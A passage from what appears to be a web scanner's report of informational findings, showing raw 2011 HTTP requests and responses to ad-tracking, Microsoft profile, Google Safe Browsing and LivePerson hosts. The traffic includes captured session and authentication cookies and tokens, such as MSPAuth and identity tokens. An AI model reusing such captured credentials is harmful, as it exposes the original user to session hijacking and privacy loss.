19:20:26&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=102861a9-5b1d-4b0c-8d49-9f073ca27715&Microsoft.NumberOfVisits=13&Microsoft.IdentityToken=z+TZ1vmNeLZxVML9U7W/lYO7k5d3HRkU0eDm4WS6Uiw+xSEwHKaM7u8zbu/2nQOrPi294TKV4roHALSLk/tSHgE2wKOsGiD40I8BozviL2QQHYemu8KnYFL5OLCF6pWu5PaGDstxStMCl3xutcDSPRMP/4ltTk9rRle9HNFHbnV8Q9r7uAWoYXz7+gb3Wjsjnk4TKCvuzGUhiDkKRxLJKWljJpRRRjrqZXBRWGMv9mpn9TKpo6vJtmJyZPqme3pMmfjWYwzZRRkvb8wTFOGVrfWIaLskIrR5Ugo8KI7kvJQOM5ILONq0+E3JCoMfBYTX03Bw+cR9BY54Cp8Obs6OeZ4O7XP45o7jNldxdSuGXxNWPEezoqN89rbWK/CsZwc+swvCrSVgcXDUGoj19SfPbyTsbXUsHdOVTI3ttXpDzBPnprkUrNI7/Cm5kJV+9Y3RKwoMuGibeo+d+KUsSYN9aKtHBSVsS3impdy9bktA5zg6S1uJEzjuKwseS5y24uCbk1wwof1yHR0A09vQQuQFPYRzFWop8oyfy/rrYR2bo3k=&Microsoft.MicrosoftId=0651-2120-0297-7612; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1298827244097:ss=1298827244097
Content-Length: 991

lp=1SUwWNaGGDPa23ukwi85T0mqLDbsQhN66HhpmwsqYNmSktbwqimPq1EOMQXsPYju6SHksiS2N9SD7GqWGMdjB14gjq*teIRYSqR56voOi6kHmDwXkULDwmu4O%21LT63kSd3MJfWcJBQaHlHwq*ChgOJKP74jDF0DkTVxMbz4KmOTJNapj1KLynkEw%24%24&lt=1
...[SNIP]...

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 221
Content-Type: text/html; charset=utf-8
Location: https://profile.microsoft.com/RegSysProfileCenter/wizard.aspx?wizid=345281f9-6588-4888-820f-2695af056d4f
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: RPSMCA=FAASARTDoEJWyJJQc07vURRb2IP7OJxXdwNmAAAEgAAACDgsrIyFEqVH0AADoujldpDxMgO8Tte2vDmOrUvhImNDFddJu5lLU5rs96Bw5LxvdMfSlZfFrnDloVVn7YkLutgoKBhOQl4GhOFB099BtPVbyva1WRHxEZ%2BOeM/UBzSOzBvm/0TqJrugCCicY1jOtRObwXs5KIo/a5AxTcfqIqQThYO9M42fkXkJsOmvb0xxKFjziIYV1Dr3DYOKYUBuPMNvlWHmSvXN%2B2mDENVX7RkYyfRgKvAY5Gle9oeomscXvUOcRKGQ9PhlJ4wQpYbgeSEsoGZdmx8lvhfuFACZNk6ugDc6oSKXvT6uOpA1FMfXuQ%3D%3D; path=/; domain=.microsoft.com; HttpOnly;
Set-Cookie: RPSMCSA=FAASARTDoEJWyJJQc07vURRb2IP7OJxXdwNmAAAEgAAACFDsJ84SACb50AC%2BZiTa5ytd/dZO1usQvSWBiGoyPu/yGon76%2BaWDt1GZpM2/Sh3xE9QEGe/jDGrmk1WYj5zaAYW9ANLYncuShLcFIX%2BnUTLdHFQ6L6FIVMq7pygwm/0LSOdU9OKgVGGYhY1fhHTXxGhSjoRhifbIbOmEdAgRJoo459bo8YoOtXJ794YDCh4QcTPgDjBInYSeXPwInM5QF1skwhlUlBQ6YykSKmOmepw5w0atL%2Btp2l9EZ99wK2b7JBEQ6Z7Wc7huFO3hWxoRL/iHw3wM93Iyc3hFADulv/zKNZlzytXdJqzekvsk/u0RQ%3D%3D; path=/; domain=.microsoft.com; HttpOnly; secure;
Set-Cookie: RPSShare=1; path=/; domain=.microsoft.com;
Set-Cookie: MSPAuth=1I!pl5lelHVZ!TLb0brs*Vni!n8rczOGyzOH1Q!DQbo03JFKklEQcX9QqwN7ZHvGt7EDesi4w3h8qaNH1GWMp1s3UO7IGcyQHovjLT0AHSpAFuWjM*s1zwZtjNkIFbnJyV; path=/; domain=.microsoft.com; HttpOnly;
Set-Cookie: MSPProf=1SUwWNaGGDPa23ukwi85T0mqLDbsQhN66HhpmwsqYNmSktbwqimPq1EOMQXsPYju6SHksiS2N9SD7GqWGMdjB14gjq*teIRYSqR56voOi6kHmDwXkULDwmu4O!LT63kSd3MJfWcJBQaHlHwq*ChgOJKP74jDF0DkTVxMbz4KmOTJNapj1KLynkEw$$; path=/; domain=.microsoft.com; HttpOnly;
Set-Cookie: ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=aea&W=1; path=/; domain=.microsoft.com; expires=(null);
Set-Cookie: NAP=V=1.9&E=a90&C=q2NZP28uR57kyfkpnC7-SQRG_5PmcovXfKKpNP5L4eDiOX0Fc2RD-Q&W=1; path=/; domain=.microsoft.com; expires=(null);
Set-Cookie: RPSMaybe=; path=/; domain=.microsoft.com; expires=Thu, 30-Oct-1980 16:00:00 GMT;
Set-Cookie: RPSMCFLS=1; domain=.microsoft.com; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sun, 27 Feb 2011 19:20:45 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://profile.microsoft.com/RegSysProfileCenter/wizard.aspx?wizid=345281f9-6588-4888-820f-2695af056d4f">here</a>.</
...[SNIP]...

7.376. http://r.turn.com/r/bd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/bd

Request

GET /r/bd?&pid=12&evt=99&cat=1000049,1000062,1000004 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/commentary/ashour1/English
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=undefined%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7Cundefined%7C1004; rds=undefined%7C15027%7C15027%7C15027%7Cundefined%7C15027%7C15027%7C15027%7C15027%7C15027%7C15027%7C15027%7Cundefined%7C15027; rv=1; uid=8392341830659049202; pf=OAUigOF8xDAyn4V-MXB_4QNs2iLEuMbVJE-wjPrrKutkF6mv2KDWtDMRaOjSe_6edrRUk1wIP2D7PqBJ55p6NbI0xLTQXo_XYgdUwTH9dBTHAs4XZXt3vPsbmU0SnyFUqq_oFXogL63-CvAMecZ7OG0d0rwQyv9xV5K6hrYYgijQzS-M1A8VPZtQZyWEepDOnkfq3cb8UW8TR2pRPakKZ-gOj9uiw3W0VAWENcuo4HyQKHvZ7tIRFGey9SCrXs-fHIHF76pHTnEmAxUzKrFFzZib8D9v0SrR4sHmW-5Se7fZ9zP0s71qJ0l-oisUiY6kzR847zK_HHhcO5iRwwDqj4K00QxBbnzEtfZqo4l5bm4snJWdCS9bJ2AQuBxX_S3R4JS7yu8915raFJGGpziHWDQMmud0VfVhSxc06ZmoYs0qTAqXK7vULCH6UZRh6ZDSUmlZh3-QTmpEPFpJzVv4ZeU1ZwZkesTkSaVV3p_ZlJ0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8392341830659049202; Domain=.turn.com; Expires=Fri, 26-Aug-2011 02:20:11 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 27 Feb 2011 02:20:10 GMT

GIF89a.............!.......,...........D..;

7.377. http://r1-ads.ace.advertising.com/site=743260/size=300250/u=2/bnum=73260642/xsxdata=1:93182371/hr=11/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.winamp.com%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=743260/size=300250/u=2/bnum=73260642/xsxdata=1:93182371/hr=11/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.winamp.com%252F

Request

GET /site=743260/size=300250/u=2/bnum=73260642/xsxdata=1:93182371/hr=11/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.winamp.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.winamp.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3IhiZPMaqK1rMO_9KSCKclrcnmFOOAS7F-FQULWj09v1qfWOasDOQOw; ACID=er080012979743200010; F1=BEIOh1EBAAAABAAAAEAAgEA; BASE=gKQkEmhpjJjpy24mVRcoq4SdsN4DbAA!; ROLL=AfAif6NO6AcM+tN!; aceRTB=rm=Tue, 22 Mar 2011 15:51:32 GMT|am=Tue, 22 Mar 2011 15:51:32 GMT|dc=Tue, 22 Mar 2011 15:51:32 GMT|an=Tue, 22 Mar 2011 15:51:32 GMT|; C2=J0oaNBr8Co2kGTJnjUAVLYkSs2TB1xmRM9KgFwpiGxkgiUQvJVUqSKMCItdBwhQ3WXAcIgJaGAHCFBqBwhgJjaAcIAY4FA3sEbwQpasaT+tB5ydxxZK+GoWVGLrrUZgZAass; GUID=MTI5ODgyODU1MzsxOjE2bHNxaWkxbjFhM2NyOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 27 Feb 2011 17:44:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.883736.743260.93182371XMC
Set-Cookie: C2=Z2oaNBr8Co2kGTJnjUAVLYkSs2TB1xmRM9KgFwpiGxkgiUQvJVUqSKMCItdBwhQ3WXAcIgJaGAHCFBqBwhgJjaAcIAY4FA3sEbwQpasaT+tB5ydxxZK+GoWVGLrrUZgZAassY6ACxMiBwB; domain=advertising.com; expires=Tue, 26-Feb-2013 17:44:56 GMT; path=/
Set-Cookie: F1=BkZjq1EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Tue, 26-Feb-2013 17:44:56 GMT; path=/
Set-Cookie: BASE=gKQkDmhpjJjpy24mVRcoq4SdsN4DbAQwMFaeqnP!; domain=advertising.com; expires=Tue, 26-Feb-2013 17:44:56 GMT; path=/
Set-Cookie: ROLL=AfAif6NmGvdMrtO!; domain=advertising.com; expires=Tue, 26-Feb-2013 17:44:56 GMT; path=/
Set-Cookie: 73260642=_4d6a8d99,6404615688,743260^883736^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 27 Feb 2011 17:44:56 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 666

document.write('<iframe src="http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=7eaf0669-773a-4c62-aed6-753c78a727c3&clickTag=http://r1-ads.ace.advertising.com/click/site=0000
...[SNIP]...

7.378. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Request

POST /safebrowsing/downloads?client=googlechrome&appver=9.0.597.98&pver=2.2&wrkey=AKEgNiu2mFE63FMw496NljDbfuqWVUHfR5aspR9G78SPoDGBnjDblFO5_v3By_lHgdefi2qYWL0qQkqRPEgqQcEZbPgzqr3RaA== HTTP/1.1
Host: safebrowsing.clients.google.com
Proxy-Connection: keep-alive
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=44=X-QIlN36SuAju9K9Sqs0vNKg6frf-ZEF-KP1FKK-Nl9b4YeeBHvLLNCarcWymWNRRn9QNuurcYCJgmNV-w5HFCLTrtIsbeOcjPyNdXzXMRdzlLK8sXldK9-rLXcoFXwg; PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298741422:GM=1:SG=1:S=MdrEXvDPz7E0uCmN
Content-Length: 104

goog-malware-shavar;a:27087-33173:s:39703-45816:mac
goog-phish-shavar;a:126785-131903:s:65966-67675:mac

Response

HTTP/1.1 200 OK
Content-Type: application/vnd.google.safebrowsing-update
Set-Cookie: PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298752999:GM=1:SG=1:S=KvHFEP930KIGQ0N0; expires=Mon, 25-Feb-2013 20:43:19 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sat, 26 Feb 2011 20:43:19 GMT
Server: Chunked Update Server
Content-Length: 928
X-XSS-Protection: 1; mode=block
Expires: Sat, 26 Feb 2011 20:43:19 GMT
Cache-Control: private

m:Vp7Fih-hNy8Bo8XoZW8RNjctPGQ=
n:1750
i:goog-malware-shavar
ad:27087-27094
sd:39703-39709
u:safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY-OUCIPzlAjIF-LIAAB8,JJnW7hKBrg
...[SNIP]...

7.379. http://safebrowsing.clients.google.com/safebrowsing/gethash  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/gethash

Request

POST /safebrowsing/gethash?client=googlechrome&appver=9.0.597.98&pver=2.2&wrkey=AKEgNiu2mFE63FMw496NljDbfuqWVUHfR5aspR9G78SPoDGBnjDblFO5_v3By_lHgdefi2qYWL0qQkqRPEgqQcEZbPgzqr3RaA== HTTP/1.1
Host: safebrowsing.clients.google.com
Proxy-Connection: keep-alive
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=44=X-QIlN36SuAju9K9Sqs0vNKg6frf-ZEF-KP1FKK-Nl9b4YeeBHvLLNCarcWymWNRRn9QNuurcYCJgmNV-w5HFCLTrtIsbeOcjPyNdXzXMRdzlLK8sXldK9-rLXcoFXwg; __utmx=173272373.; __utmxx=173272373.; S=static_files=8yY1lAZwM4I; PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298771072:GM=1:SG=1:S=hslp1Nh_4w3lBF1i
Content-Length: 8

4:4
.NAf

Response

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Set-Cookie: PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298771752:GM=1:SG=1:S=63MFvpsyHQ9WYp5k; expires=Tue, 26-Feb-2013 01:55:52 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sun, 27 Feb 2011 01:55:52 GMT
Server: Hash Suffix Server
Content-Length: 90
X-XSS-Protection: 1; mode=block
Expires: Sun, 27 Feb 2011 01:55:52 GMT
Cache-Control: private

vDstCHFtGEZbwtcn8ZDiIbn3bIs=
goog-malware-shavar:29003:32
.NAfVx];.W...*.5z.:.F.;.TV4....M

7.380. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Request

GET /pixel?partnerID=12&key=segment&code=D8N&code=H3I&code=C9Q&code=E6D&code=Q3K HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/commentary/ashour1/English
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=002d9af2-d1e0-46f3-a4d5-a4e3b437adec; subID="{}"; impressions="{\"430436\": [1298206796+ \"TWEQSwABRq4K5X4e_EJrqQ==\"+ 78868+ 35674+ 1731]}"; camp_freq_p1="eJzjkuF4/p1ZgFHizIKW1ywKjBpnpq58zWLAaAHmAwClcgui"; exchange_uid="eyI0IjogWyJDQUVTRVBvcWJyY1FyMU4wbkdTazNsdEpTTjgiLCA3MzQxODhdfQ=="; io_freq_p1="eJzjEua45CbAKHFmQctrFgNGCzANAEZXB44="; dp_rec="{\"2\": 1298206796}"; partnerUID="eyIxOTkiOiBbIkE5NkM3OEUwNDA1NzQ0Qzc4MDYyMTNENTczNTFBMTA0IiwgdHJ1ZV0sICI3OSI6IFsiNGRlMzBhNTAwYzhjNmI4YmY5Y2JhNzU5OTUwNWI1MjkiLCB0cnVlXX0="; segments_p1="eJzjYuZ4LMXFwtG6lxFIvjzIyMXF8XEbk8DlWVdfs3Axc5zkABKz/YDEHD+ggrlXGIHMfxwAnK4OuQ=="

Response

HTTP/1.0 302 Found
Server: IM BidManager
Date: Sun, 27 Feb 2011 02:20:09 GMT
Expires: Sun, 27-Feb-2011 02:19:49 GMT
Location: http://ad.yieldmanager.com/pixel?id=321306&id=321282&id=321359&id=723503&t=2
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/plain
Set-Cookie: segments_p1="eJzjYuZ4LMXFwtG6l5GLmWMjB5D58iAjFxfHx21MApdnXX3NAhQ+yQEkZvsBiTl+QAVzr4DU/gMJ/vcBAB5EEOc="; Domain=invitemedia.com; expires=Mon, 27-Feb-2012 02:20:09 GMT; Path=/


7.381. http://segment-pixel.invitemedia.com/set_partner_uid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /set_partner_uid

Request

GET /set_partner_uid?partnerID=79&partnerUID=4de30a500c8c6b8bf9cba7599505b529&sscs_active=1 HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://load.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0xMjc2IiB3aWR0aD0iMCIgaGVpZ2h0PSIwIiBib3JkZXI9IjAiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vaWIuYWRueHMuY29tL3NlZz9hZGQ9ODUwMzQmZXhwaXJlX2RheXM9MjAmb3RoZXI9MTc3MDAxIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD00ZGUzMGE1MDBjOGM2YjhiZjljYmE3NTk5NTA1YjUyOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=c4ae08201e9f109b02be68e4efd9ed36
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=002d9af2-d1e0-46f3-a4d5-a4e3b437adec; subID="{}"; impressions="{\"430436\": [1298206796+ \"TWEQSwABRq4K5X4e_EJrqQ==\"+ 78868+ 35674+ 1731]}"; camp_freq_p1="eJzjkuF4/p1ZgFHizIKW1ywKjBpnpq58zWLAaAHmAwClcgui"; exchange_uid="eyI0IjogWyJDQUVTRVBvcWJyY1FyMU4wbkdTazNsdEpTTjgiLCA3MzQxODhdfQ=="; io_freq_p1="eJzjEua45CbAKHFmQctrFgNGCzANAEZXB44="; dp_rec="{\"2\": 1298206796}"; partnerUID=eyIxOTkiOiBbIkE5NkM3OEUwNDA1NzQ0Qzc4MDYyMTNENTczNTFBMTA0IiwgdHJ1ZV19; segments_p1="eJzjYuZ4LMXFwtG6lxFIvjzIyMXF8XEbk8DlWVdfswBFtp5n5GLmOMkBJGb7AYk5fkDBuVdAgv84AAHbEFQ="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 27 Feb 2011 02:18:28 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sun, 27-Feb-2011 02:18:08 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: partnerUID="eyIxOTkiOiBbIkE5NkM3OEUwNDA1NzQ0Qzc4MDYyMTNENTczNTFBMTA0IiwgdHJ1ZV0sICI3OSI6IFsiNGRlMzBhNTAwYzhjNmI4YmY5Y2JhNzU5OTUwNWI1MjkiLCB0cnVlXX0="; Domain=invitemedia.com; expires=Mon, 27-Feb-2012 02:18:28 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

7.382. http://segment-pixel.invitemedia.com/unpixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /unpixel

Request

GET /unpixel?pixelID=26549&partnerID=41&clientID=2070&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=002d9af2-d1e0-46f3-a4d5-a4e3b437adec; subID="{}"; impressions="{\"430436\": [1298206796+ \"TWEQSwABRq4K5X4e_EJrqQ==\"+ 78868+ 35674+ 1731]}"; camp_freq_p1="eJzjkuF4/p1ZgFHizIKW1ywKjBpnpq58zWLAaAHmAwClcgui"; exchange_uid="eyI0IjogWyJDQUVTRVBvcWJyY1FyMU4wbkdTazNsdEpTTjgiLCA3MzQxODhdfQ=="; io_freq_p1="eJzjEua45CbAKHFmQctrFgNGCzANAEZXB44="; dp_rec="{\"2\": 1298206796}"; segments_p1="eJzjYuZ4LMXFwtG6lxFIvjzIyMXF8XEbk8DlWVdfswBFtp5n5GLmOMkBJGb7AYk5fkDBuVdAgv84AAHbEFQ="; partnerUID="eyIxOTkiOiBbIkE5NkM3OEUwNDA1NzQ0Qzc4MDYyMTNENTczNTFBMTA0IiwgdHJ1ZV0sICI3OSI6IFsiNGRlMzBhNTAwYzhjNmI4YmY5Y2JhNzU5OTUwNWI1MjkiLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 27 Feb 2011 02:20:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sun, 27-Feb-2011 02:19:40 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: segments_p1="eJzjYuZ4LMXFwtG6lxFIvjzIyMXF8XEbk8DlWVdfs3Axc5zkABKz/YDEHD+ggrlXGIHMfxwAnK4OuQ=="; Domain=invitemedia.com; expires=Mon, 27-Feb-2012 02:20:00 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

7.383. http://segments.adap.tv/data  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segments.adap.tv
Path:   /data

Request

GET /data?p=quantcast&type=gif&segment= HTTP/1.1
Host: segments.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/register
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-02-21+05%3A08%3A05"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1300863600,\"e\":1300863600,\"s\":[516],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-02-26+18%3A19%3A55";Path=/;Domain=.adap.tv;Expires=Wed, 05-Nov-42 04:06:35 GMT
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Wed, 05-Nov-42 04:06:35 GMT
p3p: CP="DEM"
Cache-Control: no-cache
Content-Type: image/gif
Server: Jetty(6.1.22)
Content-Length: 42

GIF89a.............!.......,...........D.;

7.384. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543557/sid.6543551/sid.6543598  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segs.btrll.com
Path:   /v1/tpix/-/-/-/-/-/sid.6543557/sid.6543551/sid.6543598

Request

GET /v1/tpix/-/-/-/-/-/sid.6543557/sid.6543551/sid.6543598 HTTP/1.1
Host: segs.btrll.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/commentary/ashour1/English
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BR_MBBV=Ak1eaoN1pfygARG1SHE; DRN1=AGPY7k3VNyIAY9g6TdmJwQBj2MVN1TciAGPX0VEkyuE

Response

HTTP/1.1 302 Found
Date: Sun, 27 Feb 2011 02:20:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak1eaoN1pfygARG1SHE; expires=Sun, 26-Feb-2012 02:20:09 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: DRN1=AGPY7k4H6NkAY9g6TdmJwQBj2MVOB-jZAGPX0VEkyuEAY9i_Tgfo2Q; expires=Tue, 26-Feb-2013 02:20:09 GMT; path=/; domain=.btrll.com
Location: http://cache.btrll.com/default/Pix-1x1.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


7.385. http://server.iad.liveperson.net/hc/43040610/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/43040610/

Request

GET /hc/43040610/?&site=43040610&cmd=mTagKnockPage&lpCallId=547932389657-441970258019&protV=20&lpjson=1&id=1720266903&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/RV8.jsp?siteid=8&channelid=P13C8S570N0B9A1D661E0000V104&promo=RV699SALE3&referID=ns_google_domains_tp&k=domain(){Phone-RV}&adid=5954407096&plid=&gclid=CLqQ3K_hqKcCFc9w5QodUFfOCg&clickid=1294340992
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=44502044936234,d=1297806164

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:31:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
